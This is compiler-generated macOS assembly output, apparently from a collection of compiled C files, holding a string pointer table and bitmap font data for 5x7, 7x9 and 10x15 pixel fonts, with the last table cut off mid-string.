.quad L_.str.762
.quad L_.str.763
.quad L_.str.764
.quad L_.str.765
.quad L_.str.766
.quad L_.str.767
.quad L_.str.768
.quad L_.str.769
.quad L_.str.770
.quad L_.str.771
.quad L_.str.772
.quad L_.str.773
.quad L_.str.774
.quad L_.str.775
.quad L_.str.776
.quad L_.str.777
.quad L_.str.778
.quad L_.str.779
.quad L_.str.780
.quad L_.str.781
.quad L_.str.782
.quad L_.str.783
.quad L_.str.784
.quad L_.str.785
.quad L_.str.786
.quad L_.str.787
.quad L_.str.788
.quad L_.str.789
.quad L_.str.790
.quad L_.str.791
.quad L_.str.792
.quad L_.str.793
.quad L_.str.794
.quad L_.str.795
.quad L_.str.796
.quad L_.str.797
.quad L_.str.798
.quad L_.str.799
.quad L_.str.800
.quad L_.str.801
.quad L_.str.802
.quad L_.str.803
.quad L_.str.804
.quad L_.str.805
.quad L_.str.806
.quad L_.str.807
.quad L_.str.808
.quad L_.str.809
.quad L_.str.810
.quad L_.str.811
.quad L_.str.812
.quad L_.str.813
.quad L_.str.814
.quad L_.str.815
.quad L_.str.816
.quad L_.str.817
.quad L_.str.818
.quad L_.str.819
.quad L_.str.820
.quad L_.str.821
.quad L_.str.822
.quad L_.str.823
.quad L_.str.824
.quad L_.str.825
.quad L_.str.826
.quad L_.str.827
.quad L_.str.828
.quad L_.str.829
.quad L_.str.830
.quad L_.str.831
.quad L_.str.832
.quad L_.str.833
.quad L_.str.834
.quad L_.str.835
.quad L_.str.836
.quad L_.str.837
.quad L_.str.838
.quad L_.str.839
.quad L_.str.840
.quad L_.str.841
.quad L_.str.842
.quad L_.str.843
.quad L_.str.844
.quad L_.str.845
.quad L_.str.846
.quad L_.str.847
.quad L_.str.848
.quad L_.str.849
.quad L_.str.850
.quad L_.str.851
.quad L_.str.852
.quad L_.str.853
.quad L_.str.854
.quad L_.str.855
.quad L_.str.856
.quad L_.str.857
.quad L_.str.858
.quad L_.str.859
.quad L_.str.860
.quad L_.str.861
.quad L_.str.862
.quad L_.str.863
.quad L_.str.864
.quad L_.str.865
.quad L_.str.866
.quad L_.str.867
.quad L_.str.868
.quad L_.str.869
.quad L_.str.870
.quad L_.str.871
.quad L_.str.872
.quad L_.str.873
.quad L_.str.874
.quad L_.str.875
.quad L_.str.876
.quad L_.str.877
.quad L_.str.878
.quad L_.str.879
.quad L_.str.880
.quad L_.str.881
.quad L_.str.882
.quad L_.str.883
.quad L_.str.884
.quad L_.str.885
.quad L_.str.886
.quad L_.str.887
.quad L_.str.888
.quad L_.str.889
.quad L_.str.890
.quad L_.str.891
.quad L_.str.892
.quad L_.str.893
.quad L_.str.894
.quad L_.str.895
.quad L_.str.896
.quad L_.str.897
.quad L_.str.898
.quad L_.str.899
.quad L_.str.900
.quad L_.str.901
.quad L_.str.902
.quad L_.str.903
.quad L_.str.904
.quad L_.str.905
.quad L_.str.906
.quad L_.str.907
.quad L_.str.908
.quad L_.str.909
.quad L_.str.910
.quad L_.str.911
.quad L_.str.912
.quad L_.str.913
.quad L_.str.914
.quad L_.str.915
.quad L_.str.916
.quad L_.str.917
.quad L_.str.918
.quad L_.str.919
.quad L_.str.920
.quad L_.str.921
.quad L_.str.922
.quad L_.str.923
.quad L_.str.924
.quad L_.str.925
.quad L_.str.926
.quad L_.str.927
.quad L_.str.928
.quad L_.str.929
.quad L_.str.930
.quad L_.str.931
.quad L_.str.932
.quad L_.str.933
.quad L_.str.934
.quad L_.str.935
.quad L_.str.936
.quad L_.str.937
.quad L_.str.938
.quad L_.str.939
.quad L_.str.940
.quad L_.str.941
.quad L_.str.942
.quad L_.str.943
.quad L_.str.944
.quad L_.str.945
.quad L_.str.946
.quad L_.str.947
.quad L_.str.948
.quad L_.str.949
.quad L_.str.950
.quad L_.str.951
.quad L_.str.952
.quad L_.str.953
.quad L_.str.954
.quad L_.str.955
.quad L_.str.956
.quad L_.str.957
.quad L_.str.958
.quad L_.str.959
.quad L_.str.960
.quad L_.str.961
.quad L_.str.962
.quad L_.str.963
.quad L_.str.964
.quad L_.str.965
.quad L_.str.966
.quad L_.str.967
.quad L_.str.968
.quad L_.str.969
.quad L_.str.970
.quad L_.str.971
.quad L_.str.972
.quad L_.str.973
.quad L_.str.974
.quad L_.str.975
.quad L_.str.976
.quad L_.str.977
.quad L_.str.978
.quad L_.str.979
.quad L_.str.980
.quad L_.str.981
.quad L_.str.982
.quad L_.str.983
.quad L_.str.984
.quad L_.str.985
.quad L_.str.986
.quad L_.str.987
.quad L_.str.988
.quad L_.str.989
.quad L_.str.990
.quad L_.str.991
.quad L_.str.992
.quad L_.str.993
.quad L_.str.994
.quad L_.str.995
.quad L_.str.996
.quad L_.str.997
.quad L_.str.998
.quad L_.str.999
.quad L_.str.1000
.quad L_.str.1001
.quad L_.str.1002
.quad L_.str.1003
.quad L_.str.1004
.quad L_.str.1005
.quad L_.str.1006
.quad L_.str.1007
.quad L_.str.1008
.quad L_.str.1009
.quad L_.str.1010
.quad L_.str.1011
.quad L_.str.1012
.quad L_.str.1013
.quad L_.str.1014
.quad L_.str.1015
.quad L_.str.1016
.quad L_.str.1017
.quad L_.str.1018
.quad L_.str.1019
.quad L_.str.1020
.quad L_.str.1021
.quad L_.str.1022
.quad L_.str.1023
.quad L_.str.1024
.quad L_.str.1025
.quad L_.str.1026
.quad L_.str.1027
.quad L_.str.1028
.quad L_.str.1029
.quad L_.str.1030
.quad L_.str.1031
.quad L_.str.1032
.quad L_.str.1033
.quad L_.str.1034
.quad L_.str.1035
.quad L_.str.1036
.quad L_.str.1037
.quad L_.str.1038
.quad L_.str.1039
.quad L_.str.1040
.quad L_.str.1041
.quad L_.str.1042
.quad L_.str.1043
.quad L_.str.1044
.quad L_.str.1045
.quad L_.str.1046
.quad L_.str.1047
.quad L_.str.1048
.quad L_.str.1049
.quad L_.str.1050
.quad L_.str.1051
.quad L_.str.1052
.quad L_.str.1053
.quad L_.str.1054
.quad L_.str.1055
.quad L_.str.1056
.quad L_.str.1057
.quad L_.str.1058
.quad L_.str.1059
.quad L_.str.1060
.quad L_.str.1061
.quad L_.str.1062
.quad L_.str.1063
.quad L_.str.1064
.quad L_.str.1065
.quad L_.str.1066
.quad L_.str.1067
.quad L_.str.1068
.quad L_.str.1069
.quad L_.str.1070
.quad L_.str.1071
.quad L_.str.1072
.quad L_.str.1073
.quad L_.str.1074
.quad L_.str.1075
.quad L_.str.1076
.quad L_.str.1077
.quad L_.str.1078
.quad L_.str.1079
.quad L_.str.1080
.quad L_.str.1081
.quad L_.str.1082
.quad L_.str.1083
.quad L_.str.1084
.quad L_.str.1085
.quad L_.str.1086
.quad L_.str.1087
.quad L_.str.1088
.quad L_.str.1089
.quad L_.str.1090
.quad L_.str.1091
.quad 0
.subsections_via_symbols
| the_stack_data/48272.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/225142247.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__const
.globl _font5x7 ; @font5x7
_font5x7:
.ascii "\000\000\000\000\000\000\000\372\000\000\000\340\000\340\000(\376(\376($T\376TH\304\310\020&Fl\222j\004\n\000\020\340\300\000\0008D\202\000\000\202D8\000T8\3768T\020\020|\020\020\000\001\016\f\000\020\020\020\020\020\000\000\006\006\000\004\b\020 @|\212\222\242|\000B\376\002\000N\222\222\222b\204\202\222\262\314\030(H\376\b\344\242\242\242\234<R\222\222\214\202\204\210\220\340l\222\222\222lb\222\222\224x\000\000(\000\000\000\002,\000\000\000\020(D\202(((((\000\202D(\020@\200\232\220`|\202\272\232r>H\210H>\376\222\222\222l|\202\202\202D\376\202\202\202|\376\222\222\222\202\376\220\220\220\200|\202\202\212\316\376\020\020\020\376\000\202\376\202\000\004\002\202\374\200\376\020(D\202\376\002\002\002\002\376@8@\376\376 \020\b\376|\202\202\202|\376\220\220\220`|\202\212\204z\376\220\230\224bd\222\222\222L\300\200\376\200\300\374\002\002\002\374\370\004\002\004\370\374\002\034\002\374\306(\020(\306\300 \036 \300\206\232\222\262\302\000\376\202\202\202@ \020\b\004\000\202\202\202\376 @\200@ \002\002\002\002\002\000\300\340\020\000\004**\036\002\376\024\"\"\034\034\"\"\"\024\034\"\"\024\376\034***\030\000\020~\220@\030%%9\036\376\020 \036\000\"\276\002\000\004\002\002\274\000\376\b\024\"\000\000\202\376\002\000> \036 \036>\020 \036\034\"\"\"\034?\030$$\030\030$$\030?>\020 \020\022***$ \374\"$<\002\002\004>8\004\002\0048<\002\f\002<\"\024\b\024\"2\t\t\t>\"&*2\"\000\020l\202\000\000\000\356\000\000\000\202l\020\000@\200@ @<d\304d<"
.globl _font7x9 ; @font7x9
_font7x9:
.ascii "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\375\000\000\000\000\000\000\000\000\000\000\000\340\000\000\000\340\000\000\000\000\000\000\000$\000/\000\364\000/\000\364\000$\000\000\000\000\000!\000Q\000\377\200I\000F\000\000\000q\000\212\000t\000\030\000.\000Q\000\216\000\006\000\t\000q\000\231\000e\000\002\000\r\000\000\000\000\000\340\000\000\000\000\000\000\000\000\000\000\000\000\000>\000A\000\200\200\000\000\000\000\000\000\000\000\200\200A\000>\000\000\000\000\000\000\000@\0000\000\300\0000\000@\000\000\000\004\000\004\000\037\000\004\000\004\000\000\000\000\000\000\000\000\000\006\200\007\000\000\000\000\000\000\000\000\000\b\000\b\000\b\000\b\000\b\000\000\000\000\000\000\000\003\000\003\000\000\000\000\000\000\000\000\000\003\000\f\0000\000\300\000\000\000\000\000\000\000~\000\201\000\201\000\201\000~\000\000\000\000\000A\000\201\000\377\000\001\000\001\000\000\000\000\000\203\000\205\000\211\000\221\000a\000\000\000\000\000\201\000\221\000\221\000\221\000n\000\000\000\000\000\f\0004\000D\000\377\000\004\000\000\000\000\000\361\000\221\000\221\000\216\000\000\000\000\000\000\000~\000\211\000\221\000\221\000\216\000\000\000\000\000\203\000\214\000\220\000\240\000\300\000\000\000\000\000n\000\221\000\221\000\231\000n\000\000\000\000\000q\000\211\000\211\000\221\000~\000\000\000\000\000\000\0003\0003\000\000\000\000\000\000\000\000\000\000\0006\2007\000\000\000\000\000\000\000\000\000\f\000\f\000\022\000\022\000!\000\000\000\024\000\024\000\024\000\024\000\024\000\024\000\000\000!\000\022\000\022\000\f\000\f\000\000\000\000\000\000\000\300\000\200\000\215\000\220\000`\000\000\000<\000B\000\271\000\305\000\251\000|\000\004\000\001\000\016\000t\000\204\000t\000\016\000\001\000\000\000\377\000\221\000\221\000\231\000f\000\000\000\000\000<\000B\000\201\000\201\000\201\000\000\000\000\000\377\000\201\000\201\000B\000<\000\000\000\000\000\377\000\221\000\221\000\221\000\201\000\000\000\000\000\377\000\220\000\220\000\220\000\200\000\000\000\000\000<\000B\000\201\000\201\000\217\000\000\000\000\000\377\000\020\000\020\000\020\000\377\000\000\000\000\000\201\000\201\000\377\000\201\000\201\000\000\000\000\000\001\000\201\000\201\000\376\000\000\000\000\000\000\000\377\000\030\000$\000B\000\201\000\000\000\000\000\377\000\001\000\001\000\001\000\001\000\000\000\377\0000\000\f\000\f\0000\000\377\000\000\000\000\000\377\000`\000\030\000\006\000\377\000\000\000\000\000<\000B\000\201\000B\000<\000\000\000\000\000\377\000\210\000\210\000\220\000`\000\000\000\000\000<\000B\000\201\000C\000<\200\000\000\000\000\377\000\210\000\210\000\214\000s\000\000\000\000\000a\000\221\000\221\000\211\000\206\000\000\000\200\000\200\000\200\000\377\000\200\000\200\000\200\000\000\000\376\000\001\000\001\000\001\000\376\000\000\000\200\000p\000\016\000\001\000\016\000p\000\200\000\360\000\017\000\f\0000\000\f\000\017\000\360\000\000\000\203\000d\000\030\000d\000\203\000\000\000\000\000\300\0000\000\017\0000\000\300\000\000\000\000\000\203\000\205\000\231\000\241\000\301\000\000\000\000\000\000\000\377\200\200\200\200\200\000\000\000\000\200\000@\0000\000\f\000\002\000\001\200\000\000\000\000\000\000\200\200\200\200\377\200\000\000\000\000\000\000\f\0000\000\300\0000\000\f\000\000\000\000\200\000\200\000\200\000\200\000\200\000\200\000\200\000\000\000\000\000\000\200\000@\000\000\000\000\000\000\000&\000)\000)\000*\000\036\000\001\000\000\000\377\000\022\000!\000!\000\036\000\000\000\000\000\036\000!\000!\000!\000!\000\000\000\000\000\036\000!\000!\000\022\000\377\000\000\000\000\000\036\000)\000)\000)\000\031\000\000\000\000\000\020\000\020\000\177\000\220\000\220\000\220\000\000\000\034\200\"\200\"\200\024\200?\000\000\000\000\000\377\000\020\000 \000 \000\037\000\000\000\000\000\000\000 \000 \000\277\000\000\000\000\000\000\000 \200 \200 \200\277\000\000\000\000\000\000\000\377\000\b\000\024\000\"\000\001\000\000\000\000\000\200\000\200\000\377\000\000\000\000\000\000\000?\000\020\000 \000?\000\020\000 \000?\000\000\000?\000\020\000 \000 \000\037\000\000\000\000\000\036\000!\000!\000!\000\036\000\000\000\000\000?\200\024\000\"\000\"\000\034\000\000\000\000\000\034\000\"\000\"\000\024\000?\200\000\000\000\000?\000\020\000 \000 \0000\000\000\000\000\000\021\000)\000)\000%\000\"\000\000\000\000\000 \000~\000!\000!\000!\000\000\000\000\000>\000\001\000\001\000\002\000?\000\000\000\000\0000\000\016\000\001\000\016\0000\000\000\0008\000\007\000\f\000\030\000\f\000\007\0008\000\000\000!\000\022\000\f\000\022\000!\000\000\000\000\0000\200\f\200\003\000\f\0000\000\000\000\000\000#\000%\000)\0001\000!\000\000\000\000\000\b\000w\000\200\200\200\200\000\000\000\000\000\000\000\000\000\000\377\200\000\000\000\000\000\000\000\000\000\000\200\200\200\200w\000\b\000\000\000\004\000\b\000\b\000\004\000\004\000\b\000\000\000~\000~"
.space 11
.globl _font10x15 ; @font10x15
_font10x15:
.ascii "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\177\310\000\000\000\000\000\000\000\000\000\000\000\000\000\000x\000\000\000\000\000x\000\000\000\000\000\000\000\000\000\000@\bX\t\340\036@hX\t\340\036@h@\b\000\000\000\000\000\000\000\030\030$\b\177\374!\b \360\000\000\000\000\000\000<\bB\030B B\300=\000\002\360\r\b\021\ba\b@\360\000\340\001\020:\bF\bE\210H\3100p\0000\000h\001\200\000\000\000\000\000\000p\000|\000p\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\007\360\b\b\020\004 \002 \002\000\000\000\000\000\000@\002@\002 \004\020\030\017\340\000\000\000\000\000\000\000\000\000\000\020\000\022\000\016\000x\000\016\000\022\000\020\000\000\000\000\000\000\200\000\200\000\200\000\200\017\370\000\200\000\200\000\200\000\200\000\000\000\000\000\000\000\000\0002\000<\000\000\000\000\000\000\000\000\000\000\000\000\000\200\000\200\000\200\000\200\000\200\000\200\000\200\000\000\000\000\000\000\000\000\000\000\000\030\000\030\000\000\000\000\000\000\000\000\000\000\000\000\000\002\000\f\0000\000\300\003\000\f\0000\000@\000\000\000\000\000\037\340 \020@\b@\b@\b@\b \020\037\340\000\000\000\000 \b \b@\b\177\370\000\b\000\b\000\b\000\000\000\000\000\000`\030@(@H@\210A\bB\b<\b\000\000\000\000\000\000@\bB\bB\bB\bB\bB\b=\360\000\000\000\000\000\000\000\300\001@\006@\030@ @\177\370\000@\000@\000\000\000\000\000\000~\bB\bB\bB\bA\b@\360\000\000\000\000\000\000\037\360\"\bD\bD\bD\bD\bD\b\003\360\000\000\000\000\000\000@\000@\030@`A\200F\000X\000`\000\000\000\000\000\000\360=\bF\bB\bC\bC\bE\2108\360\000\000\000\000?\000@\210@\210@\210@\210@\210A\020?\340\000\000\000\000\000\000\000\000\006\030\006\030\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\0062\006<\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\300\000\300\001 \001 \002\020\002\020\004\b\000\000\000\240\000\240\000\240\000\240\000\240\000\240\000\240\000\240\000\240\000\000\004\b\002\020\002\020\001 \001 \000\300\000\300\000\000\000\000\000\000\000\000p\000@\000@\000@\310A\000B\000$\000\030\000\000\000\000\000\017\300\020 \020G\210HHP((H\037\340\000 \000\030\000\340\007@8@@@8@\007@\000\340\000\030\000\000\000\000\177\370B\bB\bB\bB\bB\bC\b<\360\000\000\000\000\037\340 \020@\b@\b@\b@\b@\b`\b\000\000\000\000\177\370@\b@\b@\b@\b@\b \020\037\340\000\000\000\000\000\000\177\370B\bB\bB\bB\bB\b@\b\000\000\000\000\000\000\177\370B\000B\000B\000B\000B\000@\000\000\000\000\000\037\340 \020@\b@\b@\b@\b@\b`\370\000\000\000\000\177\370\002\000\002\000\002\000\002\000\002\000\002\000\177\370\000\000\000\000@\b@\b@\b\177\370@\b@\b@\b\000\000\000\000\000\000\000\000\000\b@\b@\b@\b@\b\177\360\000\000\000\000\000\000\177\370\003\000\004\200\b@\020 \020@\b\000\000\000\000\000\000\000\000\177\370\000\b\000\b\000\b\000\b\000\b\000\b\000\000\000\000\177\370`\000\034\000\003\200\003\200\034\000`\000\177\370\000\000\000\000\000\000\177\3700\000\f\000\003\000\000\300\0000\177\370\000\000\000\000\037\340 \020@\b@\b@\b@\b \020\037\340\000\000\000\000\000\000\177\370A\000A\000A\000A\000B\000<\000\000\000\000\000\037\340 \020@\b@\b@\b@\f \024\037\346\000\002\000\000\177\370A\000A\000A\000A\300> \000\030\000\000\000\000\000\0008\030D\bD\bB\bB\bB\bA\b`\360\000\000@\000@\000@\000@\000\177\370@\000@\000@\000@\000\000\000\000\000\177\360\000\b\000\b\000\b\000\b\000\b\000\b\177\360\000\000`\000\034\000\003\200\000p\000\b\000p\003\200\034\000`\000\000\000p\000\017\300\0008\000\340\007\000\017\000\000\340\0008\017\300p\000\000\000\000\030` \030\300\005\000\007\000\b\3000 @\030\000\000`\000\020\000\f\000\002\000\001\370\002\000\f\000\020\000`\000\000\000\000\000@\030@(@\310A\bB\bL\bP\b`\b\000\000\000\000\000\000\000\000\177\376@\002@\002@\002@\002\000\000\000\000\000\000\000\000@\0000\000\f\000\003\200\000`\000\030\000\006\000\000\000\000\000\000@\002@\002@\002@\002\177\376\000\000\000\000\000\000\000\300\003\000\f\0000\000\f\000\003\000\000\300\000\000\000\000\000\000\000\004\000\004\000\004\000\004\000\004\000\004\000\004\000\004\000\004\000\004\000\000\000\000\000\000@\000 \000\000\000\000\000\000\000\000\000\000\000\000\000\f0\bH\b\210\b\210\b\210\b\220\007\370\000\b\000\000\000\000\177\370\004\020\b\b\b\b\b\b\b\b\004\020\003\340\000\000\000\000\003\340\004\020\b\b\b\b\b\b\b\b\b\b\b\b\000\000\000\000\003\340\004\020\b\b\b\b\b\b\b\b\004\020\177\370\000\000\000\000\003\340\004\220\b\210\b\210\b\210\b\210\b\210\007\210\000\000\000\000\004\000\004\000\037\370$\000D\000D\000D\000D\000\000\000\000\000\003\300\004\"\b\022\b\022\b\022\b\022\004$\017\370\000\000\000\000\177\370\004\000\b\000\b\000\b\000\b\000\007\370\000\000\000\000\000\000\b\000\b\000\b\000\b\000O\370\000\000\000\000\000\000\000\000\000\000\000\002\b\002\b\002\b\002\b\002O\374\000\000\000\000\000\000\000\000\000\000\177\370\000\200\001\200\002@\004 \b\020\000\b\000\000\000\000\000\000@\000@\000@\000\177\370\000\000\000\000\000\000\000\000\017\370\004\000\b\000\b\000\007\370\004\000\b\000\b\000\007\370\000\000\000\000\017\370\004\000\b\000\b\000\b\000\b\000\007\370\000\000\000\000\000\000\003\340\004\020\b\b\b\b\b\b\b\b\004\020\003\340\000\000\000\000\017\376\004 \b\020\b\020\b\020\b\020\004 \003\340\000\000\000\000\003\340\004 \b\020\b\020\b\020\b\020\004 \017\376\000\000\000\000\000\000\017\370\004\000\b\000\b\000\b\000\b\000\016\000\000\000\000\000\006\030\t\b\t\b\b\210\b\210\b\210\bp\000\000\000\000\000\000\b\000\b\000?\360\b\b\b\b\b\b\b\b\b\b\000\000\000\000\017\360\000\b\000\b\000\b\000\b\000\b\000\020\017\370\000\000\b\000\006\000\001\300\0000\000\b\0000\001\300\006\000\b\000\000\000\016\000\001\340\000\030\000\340\007\000\007\000\000\340\000\030\003\340\f\000\b\b\004\020\002 \001\300\001@\002 \004\020\b\b\000\000\000\000\000\000\f\002\003\002\000\202\000d\000\030\000\340\003\000\f\000\000\000\000\000\b\030\b(\bH\b\210\t\b\n\b\f\b\b\b\000\000\000\000\000\000\001\000\017\340>\374@\002@\002@\002\000\000\000\000\000\000\000\000\000\000\000\000\177\376\000\000\000\000\000\000\000\000\000\000\000\000\000\000@\002@\002@\002>\374\017\340\001\000\000\000\000\000\000\000\000\200\001\000\001\000\000\200\000\200\000@\000@\000\200\000\000\177\360@\020@\020\177\360"
.space 12
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__const
.globl _font5x7 ## @font5x7
.p2align 4
_font5x7:
.ascii "\000\000\000\000\000\000\000\372\000\000\000\340\000\340\000(\376(\376($T\376TH\304\310\020&Fl\222j\004\n\000\020\340\300\000\0008D\202\000\000\202D8\000T8\3768T\020\020|\020\020\000\001\016\f\000\020\020\020\020\020\000\000\006\006\000\004\b\020 @|\212\222\242|\000B\376\002\000N\222\222\222b\204\202\222\262\314\030(H\376\b\344\242\242\242\234<R\222\222\214\202\204\210\220\340l\222\222\222lb\222\222\224x\000\000(\000\000\000\002,\000\000\000\020(D\202(((((\000\202D(\020@\200\232\220`|\202\272\232r>H\210H>\376\222\222\222l|\202\202\202D\376\202\202\202|\376\222\222\222\202\376\220\220\220\200|\202\202\212\316\376\020\020\020\376\000\202\376\202\000\004\002\202\374\200\376\020(D\202\376\002\002\002\002\376@8@\376\376 \020\b\376|\202\202\202|\376\220\220\220`|\202\212\204z\376\220\230\224bd\222\222\222L\300\200\376\200\300\374\002\002\002\374\370\004\002\004\370\374\002\034\002\374\306(\020(\306\300 \036 \300\206\232\222\262\302\000\376\202\202\202@ \020\b\004\000\202\202\202\376 @\200@ \002\002\002\002\002\000\300\340\020\000\004**\036\002\376\024\"\"\034\034\"\"\"\024\034\"\"\024\376\034***\030\000\020~\220@\030%%9\036\376\020 \036\000\"\276\002\000\004\002\002\274\000\376\b\024\"\000\000\202\376\002\000> \036 \036>\020 \036\034\"\"\"\034?\030$$\030\030$$\030?>\020 \020\022***$ \374\"$<\002\002\004>8\004\002\0048<\002\f\002<\"\024\b\024\"2\t\t\t>\"&*2\"\000\020l\202\000\000\000\356\000\000\000\202l\020\000@\200@ @<d\304d<"
.globl _font7x9 ## @font7x9
.p2align 4
_font7x9:
.ascii "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\375\000\000\000\000\000\000\000\000\000\000\000\340\000\000\000\340\000\000\000\000\000\000\000$\000/\000\364\000/\000\364\000$\000\000\000\000\000!\000Q\000\377\200I\000F\000\000\000q\000\212\000t\000\030\000.\000Q\000\216\000\006\000\t\000q\000\231\000e\000\002\000\r\000\000\000\000\000\340\000\000\000\000\000\000\000\000\000\000\000\000\000>\000A\000\200\200\000\000\000\000\000\000\000\000\200\200A\000>\000\000\000\000\000\000\000@\0000\000\300\0000\000@\000\000\000\004\000\004\000\037\000\004\000\004\000\000\000\000\000\000\000\000\000\006\200\007\000\000\000\000\000\000\000\000\000\b\000\b\000\b\000\b\000\b\000\000\000\000\000\000\000\003\000\003\000\000\000\000\000\000\000\000\000\003\000\f\0000\000\300\000\000\000\000\000\000\000~\000\201\000\201\000\201\000~\000\000\000\000\000A\000\201\000\377\000\001\000\001\000\000\000\000\000\203\000\205\000\211\000\221\000a\000\000\000\000\000\201\000\221\000\221\000\221\000n\000\000\000\000\000\f\0004\000D\000\377\000\004\000\000\000\000\000\361\000\221\000\221\000\216\000\000\000\000\000\000\000~\000\211\000\221\000\221\000\216\000\000\000\000\000\203\000\214\000\220\000\240\000\300\000\000\000\000\000n\000\221\000\221\000\231\000n\000\000\000\000\000q\000\211\000\211\000\221\000~\000\000\000\000\000\000\0003\0003\000\000\000\000\000\000\000\000\000\000\0006\2007\000\000\000\000\000\000\000\000\000\f\000\f\000\022\000\022\000!\000\000\000\024\000\024\000\024\000\024\000\024\000\024\000\000\000!\000\022\000\022\000\f\000\f\000\000\000\000\000\000\000\300\000\200\000\215\000\220\000`\000\000\000<\000B\000\271\000\305\000\251\000|\000\004\000\001\000\016\000t\000\204\000t\000\016\000\001\000\000\000\377\000\221\000\221\000\231\000f\000\000\000\000\000<\000B\000\201\000\201\000\201\000\000\000\000\000\377\000\201\000\201\000B\000<\000\000\000\000\000\377\000\221\000\221\000\221\000\201\000\000\000\000\000\377\000\220\000\220\000\220\000\200\000\000\000\000\000<\000B\000\201\000\201\000\217\000\000\000\000\000\377\000\020\000\020\000\020\000\377\000\000\000\000\000\201\000\201\000\377\000\201\000\201\000\000\000\000\000\001\000\201\000\201\000\376\000\000\000\000\000\000\000\377\000\030\000$\000B\000\201\000\000\000\000\000\377\000\001\000\001\000\001\000\001\000\000\000\377\0000\000\f\000\f\0000\000\377\000\000\000\000\000\377\000`\000\030\000\006\000\377\000\000\000\000\000<\000B\000\201\000B\000<\000\000\000\000\000\377\000\210\000\210\000\220\000`\000\000\000\000\000<\000B\000\201\000C\000<\200\000\000\000\000\377\000\210\000\210\000\214\000s\000\000\000\000\000a\000\221\000\221\000\211\000\206\000\000\000\200\000\200\000\200\000\377\000\200\000\200\000\200\000\000\000\376\000\001\000\001\000\001\000\376\000\000\000\200\000p\000\016\000\001\000\016\000p\000\200\000\360\000\017\000\f\0000\000\f\000\017\000\360\000\000\000\203\000d\000\030\000d\000\203\000\000\000\000\000\300\0000\000\017\0000\000\300\000\000\000\000\000\203\000\205\000\231\000\241\000\301\000\000\000\000\000\000\000\377\200\200\200\200\200\000\000\000\000\200\000@\0000\000\f\000\002\000\001\200\000\000\000\000\000\000\200\200\200\200\377\200\000\000\000\000\000\000\f\0000\000\300\0000\000\f\000\000\000\000\200\000\200\000\200\000\200\000\200\000\200\000\200\000\000\000\000\000\000\200\000@\000\000\000\000\000\000\000&\000)\000)\000*\000\036\000\001\000\000\000\377\000\022\000!\000!\000\036\000\000\000\000\000\036\000!\000!\000!\000!\000\000\000\000\000\036\000!\000!\000\022\000\377\000\000\000\000\000\036\000)\000)\000)\000\031\000\000\000\000\000\020\000\020\000\177\000\220\000\220\000\220\000\000\000\034\200\"\200\"\200\024\200?\000\000\000\000\000\377\000\020\000 \000 \000\037\000\000\000\000\000\000\000 \000 \000\277\000\000\000\000\000\000\000 \200 \200 \200\277\000\000\000\000\000\000\000\377\000\b\000\024\000\"\000\001\000\000\000\000\000\200\000\200\000\377\000\000\000\000\000\000\000?\000\020\000 \000?\000\020\000 \000?\000\000\000?\000\020\000 \000 \000\037\000\000\000\000\000\036\000!\000!\000!\000\036\000\000\000\000\000?\200\024\000\"\000\"\000\034\000\000\000\000\000\034\000\"\000\"\000\024\000?\200\000\000\000\000?\000\020\000 \000 \0000\000\000\000\000\000\021\000)\000)\000%\000\"\000\000\000\000\000 \000~\000!\000!\000!\000\000\000\000\000>\000\001\000\001\000\002\000?\000\000\000\000\0000\000\016\000\001\000\016\0000\000\000\0008\000\007\000\f\000\030\000\f\000\007\0008\000\000\000!\000\022\000\f\000\022\000!\000\000\000\000\0000\200\f\200\003\000\f\0000\000\000\000\000\000#\000%\000)\0001\000!\000\000\000\000\000\b\000w\000\200\200\200\200\000\000\000\000\000\000\000\000\000\000\377\200\000\000\000\000\000\000\000\000\000\000\200\200\200\200w\000\b\000\000\000\004\000\b\000\b\000\004\000\004\000\b\000\000\000~\000~"
.space 11
.globl _font10x15 ## @font10x15
.p2align 4
_font10x15:
.ascii "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\177\310\000\000\000\000\000\000\000\000\000\000\000\000\000\000x\000\000\000\000\000x\000\000\000\000\000\000\000\000\000\000@\bX\t\340\036@hX\t\340\036@h@\b\000\000\000\000\000\000\000\030\030$\b\177\374!\b \360\000\000\000\000\000\000<\bB\030B B\300=\000\002\360\r\b\021\ba\b@\360\000\340\001\020:\bF\bE\210H\3100p\0000\000h\001\200\000\000\000\000\000\000p\000|\000p\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\007\360\b\b\020\004 \002 \002\000\000\000\000\000\000@\002@\002 \004\020\030\017\340\000\000\000\000\000\000\000\000\000\000\020\000\022\000\016\000x\000\016\000\022\000\020\000\000\000\000\000\000\200\000\200\000\200\000\200\017\370\000\200\000\200\000\200\000\200\000\000\000\000\000\000\000\000\0002\000<\000\000\000\000\000\000\000\000\000\000\000\000\000\200\000\200\000\200\000\200\000\200\000\200\000\200\000\000\000\000\000\000\000\000\000\000\000\030\000\030\000\000\000\000\000\000\000\000\000\000\000\000\000\002\000\f\0000\000\300\003\000\f\0000\000@\000\000\000\000\000\037\340 \020@\b@\b@\b@\b \020\037\340\000\000\000\000 \b \b@\b\177\370\000\b\000\b\000\b\000\000\000\000\000\000`\030@(@H@\210A\bB\b<\b\000\000\000\000\000\000@\bB\bB\bB\bB\bB\b=\360\000\000\000\000\000\000\000\300\001@\006@\030@ 